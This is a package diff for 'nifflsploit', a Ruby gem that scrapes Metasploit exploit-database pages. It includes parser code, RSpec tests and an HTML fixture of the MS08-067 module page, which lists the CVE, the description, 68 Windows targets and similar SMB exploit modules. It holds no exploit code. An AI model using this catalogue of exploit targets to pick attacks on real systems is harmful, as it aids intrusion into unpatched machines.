nifflsploit 0.0.1 → 0.0.2
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +8 -8
- data/lib/nifflsploit/result.rb +53 -29
- data/lib/nifflsploit/version.rb +1 -1
- data/nifflsploit-0.0.1.gem +0 -0
- data/spec/lib/nifflsploit/result_spec.rb +43 -3
- data/spec/support/ms08_response.html +1 -0
- metadata +5 -2
checksums.yaml
CHANGED
|
@@ -1,15 +1,15 @@
|
|
|
1
1
|
---
|
|
2
2
|
!binary "U0hBMQ==":
|
|
3
3
|
metadata.gz: !binary |-
|
|
4
|
-
|
|
4
|
+
NzkzNDJjZDkzZjVmMTY2ODgxNTIxOTdmMWE2NDcyMmU1NDA4OTRiZQ==
|
|
5
5
|
data.tar.gz: !binary |-
|
|
6
|
-
|
|
6
|
+
OTNlNDZjZDdlOTk3MmQzMzRmMzkxYjg1NTNlYjUwYzE1NGUwOGU4Yw==
|
|
7
7
|
!binary "U0hBNTEy":
|
|
8
8
|
metadata.gz: !binary |-
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
9
|
+
MzBmZTE4ZjM5YTE1MTQ5ZWJiNTIxOGQ4MGViNzNjODA3OTdkMzYxNWE2ZTI4
|
|
10
|
+
MDBkMmIxN2RkNGJhYTVmMTc5MjE5MWIwM2RjNzBlMmI4MmQyZjQzMmNmYmIx
|
|
11
|
+
ZGQ2NTczMWY2MTY1MmU1MDQ1NGUxYTYxZjBmYjA5Y2JlNDBkNjU=
|
|
12
12
|
data.tar.gz: !binary |-
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
13
|
+
YzBjMzU2OTc3N2Y5ZTYxMTBkZjk5ZjlmMzYzNWM1OWZlYWIxNDViYzhkNjU3
|
|
14
|
+
YzMzNWZjZDYwNjc1M2JiMzUwZjlmZjZkMWExNWY3YmQ0Y2JkNTBiOGNkMzVm
|
|
15
|
+
ZGNhM2FkM2U2YzE0NzBlODk0MzI4M2I0YmUzMDcxMWI3MWQxMjg=
|
data/lib/nifflsploit/result.rb
CHANGED
|
@@ -2,38 +2,62 @@ require 'nokogiri'
|
|
|
2
2
|
|
|
3
3
|
class Nifflsploit
|
|
4
4
|
class Result
|
|
5
|
-
attr_accessor :name, :rank, :authors, :references, :development, :module_options
|
|
5
|
+
attr_accessor :name, :rank, :authors, :references, :development, :module_options, :targets, :similar_modules
|
|
6
6
|
|
|
7
7
|
def self.parse(document)
|
|
8
|
-
|
|
9
|
-
result
|
|
10
|
-
result.
|
|
8
|
+
@document = document
|
|
9
|
+
@result = Nifflsploit::Result.new
|
|
10
|
+
@result.name = @document.xpath("/html/body/div/div/section/h1").text
|
|
11
|
+
h2s = @document.xpath("/html/body/div/div/section/div/h2")
|
|
12
|
+
count = 1
|
|
13
|
+
for h2 in h2s
|
|
14
|
+
ul = @document.xpath("/html/body/div/div/section/div/ul[#{count}]")
|
|
15
|
+
self.parse_by_h2(h2, ul)
|
|
16
|
+
count += 1
|
|
17
|
+
end # for h2
|
|
11
18
|
|
|
12
|
-
|
|
13
|
-
# value for each author and return an array of authors
|
|
14
|
-
result.authors = document.xpath("/html/body/div/div/section/div/ul[2]/li").collect {|z| z.text}
|
|
15
|
-
|
|
16
|
-
# same as above, but we need the href attribute, not the text, so we need to navigate to the 'a' object
|
|
17
|
-
# and get the href link text
|
|
18
|
-
result.references = document.xpath("/html/body/div/div/section/div/ul[3]/li").collect {|z| z.xpath("a").attr('href').text}
|
|
19
|
-
|
|
20
|
-
# result.development will look like {:source_code => "http://blarg.com", :history => "http://blarg2.com"}
|
|
21
|
-
result.development = {}
|
|
22
|
-
for link in document.xpath("/html/body/div/div/section/div/ul[4]/li")
|
|
23
|
-
key = link.xpath("a").text.downcase.gsub(/\s/, "_")
|
|
24
|
-
value = link.xpath("a").attr('href').text
|
|
25
|
-
result.development[key.to_sym] = value
|
|
26
|
-
end # for link
|
|
27
|
-
|
|
28
|
-
# result.module_options will look like {:PASSWORD => "The password to reset to (default: admin)", :Proxies => "proxy"}
|
|
29
|
-
result.module_options = {}
|
|
30
|
-
for row in document.xpath("/html/body/div/div/section/div/div[2]/table/tr")
|
|
31
|
-
key = row.xpath('td[1]').text
|
|
32
|
-
value = row.xpath('td[2]').text
|
|
33
|
-
result.module_options[key.to_sym] = value
|
|
34
|
-
end # for row
|
|
35
|
-
|
|
36
|
-
return result
|
|
19
|
+
return @result
|
|
37
20
|
end # def parse
|
|
21
|
+
|
|
22
|
+
private
|
|
23
|
+
def self.parse_by_h2(h2, ul)
|
|
24
|
+
case h2.text
|
|
25
|
+
when "Exploit Rank", "Rank"
|
|
26
|
+
@result.rank = ul.xpath("li").text
|
|
27
|
+
when "Exploit Authors", "Authors"
|
|
28
|
+
# this xpath resolves to multiple authors, looking like [Author, Author], so we need to get the text
|
|
29
|
+
# value for each author and return an array of authors
|
|
30
|
+
@result.authors = ul.xpath("li").collect {|li| li.text}
|
|
31
|
+
when "Vulnerability References"
|
|
32
|
+
# same as above, but we need the href attribute, not the text, so we need to navigate to the 'a' object
|
|
33
|
+
# and get the href link text
|
|
34
|
+
@result.references = ul.xpath("li").collect {|li| li.xpath("a").attr('href').text}
|
|
35
|
+
when "Exploit Targets", "Targets"
|
|
36
|
+
@result.targets = ul.xpath("li").collect {|li| li.text}
|
|
37
|
+
when "Exploit Development", "Development"
|
|
38
|
+
# result.development will look like {:source_code => "http://blarg.com", :history => "http://blarg2.com"}
|
|
39
|
+
@result.development = {}
|
|
40
|
+
for link in ul.xpath("li")
|
|
41
|
+
key = link.xpath("a").text.downcase.gsub(/\s/, "_")
|
|
42
|
+
value = link.xpath("a").attr('href').text
|
|
43
|
+
@result.development[key.to_sym] = value
|
|
44
|
+
end # for link
|
|
45
|
+
when "Similar Exploit Modules", "Similar Modules"
|
|
46
|
+
@result.similar_modules = {}
|
|
47
|
+
for link in ul.xpath("li")
|
|
48
|
+
key = link.xpath("a").text.downcase.gsub(/\s/, "_")
|
|
49
|
+
value = link.xpath("a").attr('href').text
|
|
50
|
+
@result.similar_modules[key.to_sym] = value
|
|
51
|
+
end # for link
|
|
52
|
+
when "Exploit Module Options", "Module Options"
|
|
53
|
+
# result.module_options will look like {:PASSWORD => "The password to reset to (default: admin)", :Proxies => "proxy"}
|
|
54
|
+
@result.module_options = {}
|
|
55
|
+
for row in @document.xpath("/html/body/div/div/section/div/div[2]/table/tr")
|
|
56
|
+
key = row.xpath('td[1]').text
|
|
57
|
+
value = row.xpath('td[2]').text
|
|
58
|
+
@result.module_options[key.to_sym] = value
|
|
59
|
+
end # for row
|
|
60
|
+
end # case h2.text
|
|
61
|
+
end # def self.parse_by_h2
|
|
38
62
|
end # class Result
|
|
39
63
|
end # class Nifflsploit
|
data/lib/nifflsploit/version.rb
CHANGED
|
Binary file
|
|
@@ -43,6 +43,46 @@ describe Nifflsploit::Result do
|
|
|
43
43
|
end # it
|
|
44
44
|
end # context
|
|
45
45
|
|
|
46
|
+
context 'with a valid ms08_067_netapi response' do
|
|
47
|
+
before do
|
|
48
|
+
file = open("spec/support/ms08_response.html")
|
|
49
|
+
response = Tempfile.new("temp")
|
|
50
|
+
response.write(file.read)
|
|
51
|
+
response.rewind
|
|
52
|
+
result = Nokogiri::HTML.parse(response)
|
|
53
|
+
response.unlink
|
|
54
|
+
@result = Nifflsploit::Result.parse(result)
|
|
55
|
+
end # before
|
|
56
|
+
|
|
57
|
+
it 'returns the CVE name' do
|
|
58
|
+
@result.name.should eq("Microsoft Server Service Relative Path Stack Corruption")
|
|
59
|
+
end # it
|
|
60
|
+
|
|
61
|
+
it 'returns the exploit rank' do
|
|
62
|
+
@result.rank.should eq("Great")
|
|
63
|
+
end # it
|
|
64
|
+
|
|
65
|
+
it 'returns the exploit authors' do
|
|
66
|
+
@result.authors.should be_kind_of(Array)
|
|
67
|
+
@result.authors.first.should eq("hdm < hdm [at] metasploit.com >")
|
|
68
|
+
end # it
|
|
69
|
+
|
|
70
|
+
it 'returns Vulnerability Reference links' do
|
|
71
|
+
@result.references.should be_kind_of(Array)
|
|
72
|
+
@result.references.first.should eq("http://cvedetails.com/cve/2008-4250/")
|
|
73
|
+
end # it
|
|
74
|
+
|
|
75
|
+
it 'returns Development links' do
|
|
76
|
+
@result.development.should be_kind_of(Hash)
|
|
77
|
+
@result.development[:source_code].should eq("http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/smb/ms08_067_netapi.rb")
|
|
78
|
+
end # it
|
|
79
|
+
|
|
80
|
+
it 'returns Module Options hash' do
|
|
81
|
+
@result.module_options.should be_kind_of(Hash)
|
|
82
|
+
@result.module_options[:RHOST].should eq("The target address")
|
|
83
|
+
end # it
|
|
84
|
+
end # context
|
|
85
|
+
|
|
46
86
|
context 'with an invalid response' do
|
|
47
87
|
before do
|
|
48
88
|
document = Nokogiri::HTML::Document.new
|
|
@@ -51,9 +91,9 @@ describe Nifflsploit::Result do
|
|
|
51
91
|
|
|
52
92
|
it 'returns an empty result object' do
|
|
53
93
|
@result.name.should be_empty
|
|
54
|
-
@result.rank.should
|
|
55
|
-
@result.authors.should
|
|
56
|
-
@result.references.should
|
|
94
|
+
@result.rank.should be_nil
|
|
95
|
+
@result.authors.should be_nil
|
|
96
|
+
@result.references.should be_nil
|
|
57
97
|
@result.development.to_a.should be_empty
|
|
58
98
|
@result.module_options.to_a.should be_empty
|
|
59
99
|
end # it
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<!doctype html> <html lang="en"> <head> <script src="//cdn.optimizely.com/js/13222550.js"></script> <meta charset="utf-8"> <section id="mainContent" class="twoCol clearfix"> <title>Microsoft Server Service Relative Path Stack Corruption | Metasploit Exploit Database (DB)</title> <META NAME="Description" CONTENT="This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development."> <link rel="shortcut icon" href="/images/global/favicon.ico" type="image/x-icon" /> <script type="text/javascript" src="/js/jquery-1.4.4.js"></script> <script type="text/javascript" src="/js/html5.js"></script> <script type="text/javascript" src="/js/jquery.joverlay.min.js"></script> <script type="text/javascript" src="/js/hoverIntent.js"></script> <!--[if (gte IE 6)&(lte IE 8)]> <script type="text/javascript" src="/js/selectivizr.js"></script> <![endif]--> <link rel="stylesheet" type="text/css" href="/css/style.css"/> <link rel="stylesheet" type="text/css" href="/modules/modules.css"/> <script type="text/javascript" src="/js/browser.js"></script> <script type="text/javascript"> $(function(){ $("#headNav ul.nav li.pri").hoverIntent( config ); function showSub() { if(($(this).find("ul.sec").length>0) && ($(this).hasClass("active")==false)) { $("#headNav ul.nav li.pri ul.sec").css("display", "none"); $(".secNav").css("display", "none"); $(".secNav").css("display", "block"); $(this).find("ul.sec").fadeIn("fast"); } else if($(this).find("ul.sec").length==0) { $(".secNav, ul.sec").css("display", "none"); } } function hideSub() { if($(this).hasClass("active")==false) { $(".secNav").css("display", "none"); $(this).find("ul.sec").fadeOut("fast"); } if($("#headNav ul.nav li.active").length>0) { $(".secNav").css("display", "none"); $(".secNav").css("display", "block"); $("#headNav ul.nav li.active").find("ul.sec").fadeIn("fast"); } } $("#q-search").bind("focus click", function(){ if($(this).val()=="search for keyword") { $(this).val(''); } }); $("#q-search").bind("blur", function(){ if(($(this).val()=="search for keyword") || ($(this).val()=='')) { $(this).val('search for keyword'); } }); }); </script> <STYLE type="text/css"> /* @group global reset */ html, body, h1, h2, h3, h4, h5, h6, ul, ul li, ol, ol li, dl, p, input, button, label, td, abbr, article, aside, audio, bb, canvas, datagrid, datalist, details, dialog, eventsource, figure, footer, header, hgroup, mark, menu, meter, nav, output, progress, section, time, video, blockquote { margin: 0; padding: 0; } sup { vertical-align:top; line-height:1; } fieldset, dd, button, form { margin:0; padding:0; border: none; } ul li, ol li, menu li { list-style-type: none;} img, a img { border: none; } table { border-spacing:0; *border-collapse:collapse; width:100%; } header, footer, nav, menu, section, article, aside, details, summary { display:block; } /* @end */ /* @group Default Element Styles */ body { font-size: 14px; line-height: 20px; font-family: Arial, Helvetica, sans-serif; color: #29383f; background: #5f5f5f url("../images/body-bg.jpg") repeat-x; } a { color: #0197B8; text-decoration:none; } a:hover { color:inherit; *color: #333; } nav a{ color: #333333; text-decoration:none; } nav a:hover{ color: #EA5709; text-decoration:none; } h1,h2,h3,h4,h5 { font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; color: #29383f; font-weight: normal; } h1 { font-size:36px; margin: 0 0 .5em 0; font-weight: normal; } h2 { font-size:34px; margin: 0 0 .5em 0; font-weight: normal; } h3 { font-size:24px; margin: 0 0 20px 0; font-weight: normal; } h4 { font-size:20px; margin: 0 0 .4em 0; font-weight: normal; } h5 { font-size:18px; margin: 0 0 .4em 0; font-weight: normal; } p { font-size:14px; margin:0 0 1.5em 0; } hr { display: block; border: 0; margin: 60px 0; height: 1px; background-color:#eee; color: #eee; } input[type="text"]{ display: block; font:normal 15px/19px arial; color: #4b4b4b; border: 1px solid #d7d7d7; padding:6px 10px; width:250px; box-shadow: 1px 1px 5px #F1F1F1 inset; -moz-box-shadow: 1px 1px 5px #F1F1F1 inset; -webkit-box-shadow: 1px 1px 5px #F1F1F1 inset; -khtml-box-shadow: 1px 1px 5px #F1F1F1 inset; } input.smallInput { width:90px; } input.itl { color:#999; } /* @end */ /* @group clearfix */ .clearfix:after { content: ".";display: block;height: 0;visibility: hidden; clear: both; } .clearfix { zoom: 1; }/* Clearfix for IE 7 */ /* @end */ /* @group sprites */ .icon { background-image:url(../images/sprite/icons.png); background-repeat:no-repeat; } /* @end */ /* @group Patterns */ .fLt { float:left; } .fRt { float:right; } .block { display:block; } .displayHidden { display:none; } .displayInlineBlock { display:inline-block; } .alignCenter { text-align:center; } .alignLeft { text-align:left; } .alignRight { text-align:right; } .rPos { position: relative; } .aPos { position: absolute; } .marB0 { margin-bottom:0px; } .marB5 { margin-bottom:5px; } .marB10 { margin-bottom:10px; } .marB15 { margin-bottom:15px; } .marB20 { margin-bottom:20px; } .marB25 { margin-bottom:25px; } .marB30 { margin-bottom:30px; } .marB35 { margin-bottom:35px; } .marB40 { margin-bottom:40px; } .marB45 { margin-bottom:45px; } .marB47 { margin-bottom:47px; } .marB50 { margin-bottom:50px; } .marB60 { margin-bottom:60px; } .marB70 { margin-bottom:70px; } .marB80 { margin-bottom:80px; } .marR20 { margin-right:20px; } .marT0 { margin-top:0; } .marT10 { margin-top:10px; } .marT20 { margin-top:20px; } .marT30 { margin-top:30px; } .marL25 { margin-left:25px; } .pad0 { padding: 0; } .alignCenter{ text-align: center; } .button, .button:visited { display:inline-block; font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; padding:4px 16px 3px 10px; padding:4px 16px 4px 10px\\9; text-transform: uppercase; font-size: 15px; color: #0197B8; border: 1px solid #f1f1f1; background: #fff url(../images/button_bg.gif) repeat-x bottom; -moz-border-radius: 0 14px 14px 0; -webkit-border-radius: 0 14px 14px 0; -khtml-border-radius: 0 14px 14px 0; border-radius: 0 14px 14px 0; } .button:hover { color: #000; } .mainBtn, a.mainBtn { font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; padding: 7px 15px; font-size: 15px; color: #fff; text-transform: uppercase; position: relative; -moz-border-radius: 20px; -webkit-border-radius: 20px; -khtml-border-radius: 20px; border-radius: 20px; border:none; cursor:pointer; background: #0197b8 url(../images/blue_button_bg.gif) repeat-x top; } .greyBtn{ border-left: 2px solid #E0E0E0; border-right: 2px solid #E0E0E0; font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; padding: 7px 25px; *padding: 6px 25px 6px 25px; font-size: 15px; color: #00a8c6; text-transform: uppercase; -moz-border-radius: 20px; -webkit-border-radius: 20px; -khtml-border-radius: 20px; border-radius: 20px; cursor:pointer; background: #fff url(../images/grey_btn_bg.jpg) repeat-x bottom; zoom:1; } .greyBtn:hover{ background: #fff url(../images/grey_btn_hover_bg.jpg) repeat-x top; } .mainBtn:hover { background: #0197b8 url(../images/blue_button_bg.gif) repeat-x bottom; } .mainBtnSmall, a.mainBtnSmall { padding: 6px 30px; } .downloadBtn, a.downloadBtn { padding-left: 40px; *padding-left:30px; display: inline-block; margin-right:12px; } .downloadBtn em { background: url(../images/download.png) no-repeat top left; display:block; *display:none; position: absolute; top: -6px; left: -15px; width: 61px; height: 49px; padding-left: 50px; } .headBulletList h4{ background: url("../images/icons/bullet7.png") no-repeat 0 5px; padding-left: 25px; } .mobilisafeOverview .headBulletList p{ padding-left: 25px; } .headBulletList ul{ padding-left:25px; } .content_list { list-style-type: none; padding-left: 3px; } .content_list li { background: url(../images/icons/bullet7.png) no-repeat 0 3px; padding-left: 22px; margin-bottom: 10px; } .bulletList li { background: url(../images/bullet.png) no-repeat left 7px; padding-left: 14px; margin: 0 0 10px 2px; color: #333; } .contributorsList .bulletList a{color: #333;} .contributorsList .bulletList a:hover{color: #EA5709;} .numBullet li{ margin-bottom:20px; } .numBullet li:last-child{ margin-bottom: 0; } .numBullet span{ padding-right: 10px; color: #666; font-size: 16px; display: block; float: left; } .numBullet strong{ font-weight: normal; display: block; padding-left: 23px; } .numBullet strong .note{ font-size: 11px; font-style: normal; line-height: 14px; display: block; margin-top: 3px; } .subBulletList li { background: url(../images/icons/bullet-sub.png) no-repeat left 8px; padding-left:15px; margin: 0 0 10px 2px; } .smallList li { font:normal 12px/16px arial; color:#666; margin-bottom:6px; background: url(../images/sprite/bullet-small.png) no-repeat left 7px; padding-left:12px; } sup{ font-size: 10px; vertical-align: top; _line-height: 1px; line-height: -1px; } sup.note{ font-size: 10px; vertical-align: top; _line-height: 1px; line-height: -1px; } /* @end */ /* @group Header */ .header{ border-top: 3px solid #EA5709; padding: 0 20px 0 30px; background-color: #fff; } .header .logo{ padding-top: 22px; display: block; width: 240px; float: left; } .logo img{ display: block; } .header .primeNav{ width: 400px; float: right; } .toplinks{ width: 200px; float: right; margin-top: 37px; } .toplinks li{ background: url("../images/toplinks-divider.gif") no-repeat scroll right center transparent; float: left; font-weight: bold; } .toplinks li:last-child{ background: none; } .toplinks a{ font-family: "Trebuchet MS",Arial,Helvetica,sans-serif; font-size: 15px; color: #333333; display: block; font-weight: normal; padding: 0 10px; } .primeLinks{ width: 100px; background: url("../images/prime-nav-bg.png") no-repeat left top; float: right; padding: 40px 25px 35px; position: relative; } .primeLinks > a{ background: url("../images/arrow.png") no-repeat right 5px; display: block; } .primeLinks:hover ul{ display: block; } .primeLinks ul{ position: absolute; padding: 0 15px; width: 98px; left: 9px; top: 90px; background-color: #fff; display: none; } .primeLinks li{ padding: 8px 0; border-bottom: 1px solid #ddd; } .primeLinks li:last-child{ border-bottom: none; } .primeLinks li a{ font-size: 13px; line-height: 13px; font-family: "Trebuchet MS",Arial,Helvetica,sans-serif; } .bannerWrap{ padding: 50px 30px; text-align: center; background-color: #202020; background-color: rgba(0,0,0,0.7); } .bannerWrap h1{ font-size: 36px; line-height: 36px; color: #e7e7e7; margin-bottom: 20px; } .bannerWrap strong{ font: normal 22px/22px "Trebuchet MS", Arial, Helvetica, sans-serif; display: block; color: #EA5709; margin-bottom: 25px; } .bannerWrap p{ font: normal 14px/20px "Trebuchet MS", Arial, Helvetica, sans-serif; color: #a5a5a5; margin-bottom: 25px; } /* @end */ /* @group Freamwok */ .wrap { width: 980px; margin: 0 auto; box-shadow:0 0 15px #000000; -moz-box-shadow:0 0 15px #000000; -webkit-box-shadow:0 0 15px #000000; } .container{ padding: 50px 30px 40px; background-color: #fff; } .metaInfoBlock{ margin-bottom: 40px; } .metaInfoBlock article{ width: 270px; float: left; margin-right: 55px; } .metaInfoBlock article:last-child{ margin-right: 0; } .bannerBlock{ padding-top: 40px; background: url("../images/shadow-top.png") center top no-repeat; text-align: center; margin-bottom: 60px; } .bannerBlock strong{ font-size: 18px; font-weight: normal; line-height: 18px; color: #666; display: block; margin-bottom: 25px; } .bannerPad{ padding-bottom: 40px; background: url("../images/shadow-bot.png") center bottom no-repeat; } .bannerBlock p{ padding-top: 15px; font-size: 13px; line-height: 13px; color: #666; } .contributorsList h3{ margin-bottom: 30px; } .contributorsList article{ width: 190px; float: left; margin-right: 50px; } .contributorsList article:last-child{ margin-right: 0; } /* @end */ /* @group footer */ .footer{ border-top: 1px solid #ebebeb; } .footerPad{ border-top: 1px solid #fff; padding: 20px 30px; background-color: #f7f7f7; } .copyright{ width: 230px; float: left; } .copyright a{ display: block; width: 110px; float: left; margin-right: 7px; } .copyright span{ float: left; color: #333; } .copyright img{ display: block; } .footerNav{ width: 640px; *width: 640px; -bracket-:hack(; width: 640px; ); width: 640px\\9; float: right; } @-moz-document url-prefix() { .footerNav { width: 640px; } } .footerNav li{ padding-right: 15px; padding: 2px 15px 2px 0; float: left; font-weight: bold; } .footerNav li:last-child{ padding-right: 0; } .footerNav li.twitIcon{ background: url(../images/twitIcon.png) no-repeat left 2px; padding-left: 35px; } .footerNav a{ color: #29383F; } .footerNav a:hover{ color: ##EA5709; } .footerNav .blue{ color: #EA5709; } .footerNav .blue:hover{ color: #333; } .freeTools:hover {*color: #666} /* @end */</STYLE> </head> <body> <div class="wrap"> <header class="header"> <div class="clearfix"> <span class="logo"><a href="http://www.metasploit.com"><img src="/revamp/images/metasploit-logo.png" title="Metasploit" alt="Metasploit" border=0 /></a></span> <nav class="primeNav"> <div class="primeLinks"> <a href="http://www.rapid7.com/" target="_blank"><img src="/revamp/images/rapid7-logo.png" title="Rapid7" alt="Rapid7" /></a> <ul> <li><a href="http://www.rapid7.com/resources/free-tools.jsp" target="_blank">Free Tools</a></li> <li><a href="https://community.rapid7.com/" target="_blank">Community</a></li> <li><a href="http://www.rapid7.com/contact/" target="_blank">Contact</a></li> <li><a href="http://www.rapid7.com/company/" target="_blank">About</a></li> </ul> </div> <ul class="toplinks clearfix"> <li><a href="/modules/" title="Exploits database">Exploits</a></li> <li><a href="https://community.rapid7.com/community/metasploit/blog" target="_blank" title="Metasploit blog">Blog</a></li> <li><a href="http://www.rapid7.com/support/" target="_blank" title="Rapid7 support">Support</a></li> </ul> </nav><!--primeNav--> </div><!--clearfix--> </header><!--header--> <div id="bodyContent"> <div id="breadcrumbs"> <a href="/" title="Home">Home</a> > <span>Exploit DB</span> </div><!-- breadcrumbs --> <section id="mainContent" class="twoCol clearfix"> <h1>Microsoft Server Service Relative Path Stack Corruption</h1> <div class="lCol"> <p>This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.</p> <p> <a href="/modules/" class="fLt blueBtn"><span>Search Other Modules</span></a><br> </p> <br/><h2>Exploit Rank</h2> <ul> <li class='module_info'>Great</li> </ul> <br/><h2>Exploit Authors</h2> <ul> <li>hdm < hdm [at] metasploit.com ></li> <li>Brett Moore < brett.moore [at] insomniasec.com ></li> <li>staylor < ></li> <li>jduck < jduck [at] metasploit.com ></li> </ul> <br/><h2>Vulnerability References</h2> <ul> <li><a href="http://cvedetails.com/cve/2008-4250/" rel="nofollow">CVE-2008-4250</a></li> <li><a href="http://www.osvdb.org/49243" rel="nofollow">OSVDB-49243</a></li> <li><a href="http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx" rel="nofollow">MSB-MS08-067</a></li> <li><a href="http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos" rel="nofollow">http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos</a></li> </ul> <br/><h2>Exploit Targets</h2> <ul> <li class="modrefs">0 - Automatic Targeting (default)</li> <li class="modrefs">1 - Windows 2000 Universal </li> <li class="modrefs">2 - Windows XP SP0/SP1 Universal </li> <li class="modrefs">3 - Windows XP SP2 English (AlwaysOn NX) </li> <li class="modrefs">4 - Windows XP SP2 English (NX) </li> <li class="modrefs">5 - Windows XP SP3 English (AlwaysOn NX) </li> <li class="modrefs">6 - Windows XP SP3 English (NX) </li> <li class="modrefs">7 - Windows 2003 SP0 Universal </li> <li class="modrefs">8 - Windows 2003 SP1 English (NO NX) </li> <li class="modrefs">9 - Windows 2003 SP1 English (NX) </li> <li class="modrefs">10 - Windows 2003 SP1 Japanese (NO NX) </li> <li class="modrefs">11 - Windows 2003 SP2 English (NO NX) </li> <li class="modrefs">12 - Windows 2003 SP2 English (NX) </li> <li class="modrefs">13 - Windows 2003 SP2 German (NO NX) </li> <li class="modrefs">14 - Windows 2003 SP2 German (NX) </li> <li class="modrefs">15 - Windows XP SP2 Arabic (NX) </li> <li class="modrefs">16 - Windows XP SP2 Chinese - Traditional / Taiwan (NX) </li> <li class="modrefs">17 - Windows XP SP2 Chinese - Simplified (NX) </li> <li class="modrefs">18 - Windows XP SP2 Chinese - Traditional (NX) </li> <li class="modrefs">19 - Windows XP SP2 Czech (NX) </li> <li class="modrefs">20 - Windows XP SP2 Danish (NX) </li> <li class="modrefs">21 - Windows XP SP2 German (NX) </li> <li class="modrefs">22 - Windows XP SP2 Greek (NX) </li> <li class="modrefs">23 - Windows XP SP2 Spanish (NX) </li> <li class="modrefs">24 - Windows XP SP2 Finnish (NX) </li> <li class="modrefs">25 - Windows XP SP2 French (NX) </li> <li class="modrefs">26 - Windows XP SP2 Hebrew (NX) </li> <li class="modrefs">27 - Windows XP SP2 Hungarian (NX) </li> <li class="modrefs">28 - Windows XP SP2 Italian (NX) </li> <li class="modrefs">29 - Windows XP SP2 Japanese (NX) </li> <li class="modrefs">30 - Windows XP SP2 Korean (NX) </li> <li class="modrefs">31 - Windows XP SP2 Dutch (NX) </li> <li class="modrefs">32 - Windows XP SP2 Norwegian (NX) </li> <li class="modrefs">33 - Windows XP SP2 Polish (NX) </li> <li class="modrefs">34 - Windows XP SP2 Portuguese - Brazilian (NX) </li> <li class="modrefs">35 - Windows XP SP2 Portuguese (NX) </li> <li class="modrefs">36 - Windows XP SP2 Russian (NX) </li> <li class="modrefs">37 - Windows XP SP2 Swedish (NX) </li> <li class="modrefs">38 - Windows XP SP2 Turkish (NX) </li> <li class="modrefs">39 - Windows XP SP3 Arabic (NX) </li> <li class="modrefs">40 - Windows XP SP3 Chinese - Traditional / Taiwan (NX) </li> <li class="modrefs">41 - Windows XP SP3 Chinese - Simplified (NX) </li> <li class="modrefs">42 - Windows XP SP3 Chinese - Traditional (NX) </li> <li class="modrefs">43 - Windows XP SP3 Czech (NX) </li> <li class="modrefs">44 - Windows XP SP3 Danish (NX) </li> <li class="modrefs">45 - Windows XP SP3 German (NX) </li> <li class="modrefs">46 - Windows XP SP3 Greek (NX) </li> <li class="modrefs">47 - Windows XP SP3 Spanish (NX) </li> <li class="modrefs">48 - Windows XP SP3 Finnish (NX) </li> <li class="modrefs">49 - Windows XP SP3 French (NX) </li> <li class="modrefs">50 - Windows XP SP3 Hebrew (NX) </li> <li class="modrefs">51 - Windows XP SP3 Hungarian (NX) </li> <li class="modrefs">52 - Windows XP SP3 Italian (NX) </li> <li class="modrefs">53 - Windows XP SP3 Japanese (NX) </li> <li class="modrefs">54 - Windows XP SP3 Korean (NX) </li> <li class="modrefs">55 - Windows XP SP3 Dutch (NX) </li> <li class="modrefs">56 - Windows XP SP3 Norwegian (NX) </li> <li class="modrefs">57 - Windows XP SP3 Polish (NX) </li> <li class="modrefs">58 - Windows XP SP3 Portuguese - Brazilian (NX) </li> <li class="modrefs">59 - Windows XP SP3 Portuguese (NX) </li> <li class="modrefs">60 - Windows XP SP3 Russian (NX) </li> <li class="modrefs">61 - Windows XP SP3 Swedish (NX) </li> <li class="modrefs">62 - Windows XP SP3 Turkish (NX) </li> <li class="modrefs">63 - Windows 2003 SP2 Japanese (NO NX) </li> <li class="modrefs">64 - Windows 2003 SP1 Spanish (NO NX) </li> <li class="modrefs">65 - Windows 2003 SP1 Spanish (NX) </li> <li class="modrefs">66 - Windows 2003 SP2 Spanish (NO NX) </li> <li class="modrefs">67 - Windows 2003 SP2 Spanish (NX) </li> </ul> <br/><h2>Exploit Development</h2> <ul> <li class="modrefs"><a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/smb/ms08_067_netapi.rb">Source Code</a></li> <li class="modrefs"><a href="http://dev.metasploit.com/redmine/projects/framework/repository/changes/modules/exploits/windows/smb/ms08_067_netapi.rb">History</a></li> </ul> <br/><h2>Similar Exploit Modules</h2> <ul> <li><a href="/modules/exploit/windows/smb/ms03_049_netapi">exploit/windows/smb/ms03_049_netapi</a></li> <li><a href="/modules/exploit/windows/smb/ms04_007_killbill">exploit/windows/smb/ms04_007_killbill</a></li> <li><a href="/modules/exploit/windows/smb/ms04_011_lsass">exploit/windows/smb/ms04_011_lsass</a></li> <li><a href="/modules/exploit/windows/smb/ms04_031_netdde">exploit/windows/smb/ms04_031_netdde</a></li> <li><a href="/modules/exploit/windows/smb/ms05_039_pnp">exploit/windows/smb/ms05_039_pnp</a></li> <li><a href="/modules/exploit/windows/smb/ms06_025_rasmans_reg">exploit/windows/smb/ms06_025_rasmans_reg</a></li> <li><a href="/modules/exploit/windows/smb/ms06_025_rras">exploit/windows/smb/ms06_025_rras</a></li> <li><a href="/modules/exploit/windows/smb/ms06_040_netapi">exploit/windows/smb/ms06_040_netapi</a></li> <li><a href="/modules/exploit/windows/smb/ms06_066_nwapi">exploit/windows/smb/ms06_066_nwapi</a></li> <li><a 